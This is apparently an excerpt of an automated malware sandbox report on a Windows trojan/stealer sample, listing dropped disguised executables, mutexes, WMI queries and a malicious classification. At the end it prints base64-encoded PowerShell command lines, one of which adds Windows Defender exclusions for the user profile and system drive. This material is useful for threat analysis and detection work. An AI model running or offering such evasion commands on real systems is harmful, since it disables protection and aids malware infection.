Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B560F7	13_2_00B560F7
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B74044	13_2_00B74044
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B52125	13_2_00B52125
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B59111	13_2_00B59111
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B582D0	13_2_00B582D0
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B4E394	13_2_00B4E394
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B51476	13_2_00B51476
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B56445	13_2_00B56445
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B67738	13_2_00B67738
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B5976F	13_2_00B5976F
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B67967	13_2_00B67967
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B50949	13_2_00B50949
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B43AB7	13_2_00B43AB7
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B6FA90	13_2_00B6FA90
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B44C6E	13_2_00B44C6E
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B55E86	13_2_00B55E86
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B50FAC	13_2_00B50FAC
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B42FCB	13_2_00B42FCB
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B6FF3E	13_2_00B6FF3E
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E7F4C	15_2_00007FF6D55E7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55D7960	15_2_00007FF6D55D7960
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F6470	15_2_00007FF6D55F6470
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F73BC	15_2_00007FF6D55F73BC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F6E70	15_2_00007FF6D55F6E70
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E2E50	15_2_00007FF6D55E2E50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F66EC	15_2_00007FF6D55F66EC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E7D98	15_2_00007FF6D55E7D98
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55EE5B0	15_2_00007FF6D55EE5B0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E1D90	15_2_00007FF6D55E1D90
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E7F4C	15_2_00007FF6D55E7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F1038	15_2_00007FF6D55F1038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55EE11C	15_2_00007FF6D55EE11C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55FA0F8	15_2_00007FF6D55FA0F8
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55D90D0	15_2_00007FF6D55D90D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E1F94	15_2_00007FF6D55E1F94
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55D1F50	15_2_00007FF6D55D1F50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F481C	15_2_00007FF6D55F481C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E6030	15_2_00007FF6D55E6030
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F1FE4	15_2_00007FF6D55F1FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E37E0	15_2_00007FF6D55E37E0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E87D0	15_2_00007FF6D55E87D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E21A0	15_2_00007FF6D55E21A0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E1980	15_2_00007FF6D55E1980
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55EA530	15_2_00007FF6D55EA530
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E23A4	15_2_00007FF6D55E23A4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E1B84	15_2_00007FF6D55E1B84
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F4380	15_2_00007FF6D55F4380
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F1038	15_2_00007FF6D55F1038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55EEC30	15_2_00007FF6D55EEC30
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E3BE4	15_2_00007FF6D55E3BE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 18_2_00007FFE01217508	18_2_00007FFE01217508
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055848E	21_2_0055848E
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_00566CDC	21_2_00566CDC
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005540FE	21_2_005540FE
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_00564088	21_2_00564088
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005600B7	21_2_005600B7
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_00567153	21_2_00567153
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005751C9	21_2_005751C9
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005662CA	21_2_005662CA
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005532F7	21_2_005532F7
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005643BF	21_2_005643BF
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0057D440	21_2_0057D440
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055F461	21_2_0055F461
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055C426	21_2_0055C426
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005677EF	21_2_005677EF
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055286B	21_2_0055286B
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0057D8EE	21_2_0057D8EE
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_005819F4	21_2_005819F4
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055E9B7	21_2_0055E9B7
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_00563E0B	21_2_00563E0B
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055EFE2	21_2_0055EFE2
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_00574F9A	21_2_00574F9A
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066848E	29_2_0066848E
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006640FE	29_2_006640FE
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006700B7	29_2_006700B7
Source: C:\ProgramData\svchost.exe	Code function: 29_2_00674088	29_2_00674088
Source: C:\ProgramData\svchost.exe	Code function: 29_2_00677153	29_2_00677153
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006851C9	29_2_006851C9
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006632F7	29_2_006632F7
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006762CA	29_2_006762CA
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006743BF	29_2_006743BF
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066F461	29_2_0066F461
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0068D440	29_2_0068D440
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066C426	29_2_0066C426
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006777EF	29_2_006777EF
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066286B	29_2_0066286B
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0068D8EE	29_2_0068D8EE
Source: C:\ProgramData\svchost.exe	Code function: 29_2_006919F4	29_2_006919F4
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066E9B7	29_2_0066E9B7
Source: C:\ProgramData\svchost.exe	Code function: 29_2_00676CDC	29_2_00676CDC
Source: C:\ProgramData\svchost.exe	Code function: 29_2_00673E0B	29_2_00673E0B
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066EFE2	29_2_0066EFE2
Source: C:\ProgramData\svchost.exe	Code function: 29_2_00684F9A	29_2_00684F9A
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B038A8	32_2_0000023225B038A8
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225AFD0E0	32_2_0000023225AFD0E0
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225AF1F2C	32_2_0000023225AF1F2C
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B344A8	32_2_0000023225B344A8
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B2DCE0	32_2_0000023225B2DCE0
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B22B2C	32_2_0000023225B22B2C
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C31F2C	38_2_0000016716C31F2C
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C3D0E0	38_2_0000016716C3D0E0
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C438A8	38_2_0000016716C438A8
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C62B2C	38_2_0000016716C62B2C
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C6DCE0	38_2_0000016716C6DCE0
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C744A8	38_2_0000016716C744A8
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E88E1F2C	39_2_00000245E88E1F2C
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E88F38A8	39_2_00000245E88F38A8
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E88ED0E0	39_2_00000245E88ED0E0
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E8912B2C	39_2_00000245E8912B2C
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E89244A8	39_2_00000245E89244A8
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E891DCE0	39_2_00000245E891DCE0
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9B870D6F	42_2_00007FFD9B870D6F
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA20317	42_2_00007FFD9BA20317
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA34AFA	42_2_00007FFD9BA34AFA
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA33A88	42_2_00007FFD9BA33A88
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA372C0	42_2_00007FFD9BA372C0
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA35A31	42_2_00007FFD9BA35A31
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA34980	42_2_00007FFD9BA34980
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA351D3	42_2_00007FFD9BA351D3
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA370D8	42_2_00007FFD9BA370D8
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA256ED	42_2_00007FFD9BA256ED
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA36720	42_2_00007FFD9BA36720
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA34DB8	42_2_00007FFD9BA34DB8
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BA36CFA	42_2_00007FFD9BA36CFA
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BAC405A	42_2_00007FFD9BAC405A
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Code function: 42_2_00007FFD9BAC4175	42_2_00007FFD9BAC4175

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: String function: 00007FF72B0525F0 appears 100 times
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: String function: 00007FF72B052760 appears 36 times
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: String function: 00007FF6D55D2B30 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: String function: 00B61D60 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: String function: 00B61590 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: String function: 0056EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: String function: 0056F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: String function: 0056EB78 appears 39 times
Source: C:\ProgramData\svchost.exe	Code function: String function: 0067EC50 appears 56 times
Source: C:\ProgramData\svchost.exe	Code function: String function: 0067F5F0 appears 31 times
Source: C:\ProgramData\svchost.exe	Code function: String function: 0067EB78 appears 39 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176

Source: unicodedata.pyd.5.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: RuntimeBroker2.0.exe.0.dr

Static PE information: No import functions for PE file found

Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameRuntimeBroker2.exe< vs 87Bym0x4Fy.exe

Source: 87Bym0x4Fy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: libcrypto-1_1.dll.5.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
Source: python310.dll.5.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
Source: unicodedata.pyd.5.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9937050102833638

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@150/148@1/1

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Code function: 5_2_00007FF72B0529E0 GetLastError,FormatMessageW,MessageBoxW,

5_2_00007FF72B0529E0

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe

Code function: 13_2_00B5C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

13_2_00B5C652

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

File created: C:\Program Files (x86)\windows mail\RKjtGQcyio.exe

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe

File created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7176
Source: C:\Windows\System32\SIHClient.exe	Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3e64fe795a96f6df9d1018608996331101f86f90de28dc67ad34401869b49857
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Users\user\cscript.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\ProgramData\Microsoft\based.exe	Mutant created: \Sessions\1\BaseNamedObjects\r
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmffrhfj.vbq.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Command line argument: sfxname	13_2_00B6037C
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Command line argument: sfxstime	13_2_00B6037C
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Command line argument: STARTDLG	13_2_00B6037C
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Command line argument: sfxname	21_2_0056DF1E
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Command line argument: sfxstime	21_2_0056DF1E
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Command line argument: STARTDLG	21_2_0056DF1E
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Command line argument: xzZ	21_2_0056DF1E
Source: C:\ProgramData\svchost.exe	Command line argument: C:\ProgramData	29_2_0067DF1E
Source: C:\ProgramData\svchost.exe	Command line argument: sfxname	29_2_0067DF1E
Source: C:\ProgramData\svchost.exe	Command line argument: sfxstime	29_2_0067DF1E
Source: C:\ProgramData\svchost.exe	Command line argument: STARTDLG	29_2_0067DF1E
Source: C:\ProgramData\svchost.exe	Command line argument: xzk	29_2_0067DF1E

Source: 87Bym0x4Fy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 87Bym0x4Fy.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: based.exe, 00000011.00000003.2130901869.000002A15E1C8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 87Bym0x4Fy.exe	Virustotal: Detection: 68%
Source: 87Bym0x4Fy.exe	ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\87Bym0x4Fy.exe "C:\Users\user\Desktop\87Bym0x4Fy.exe"
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="
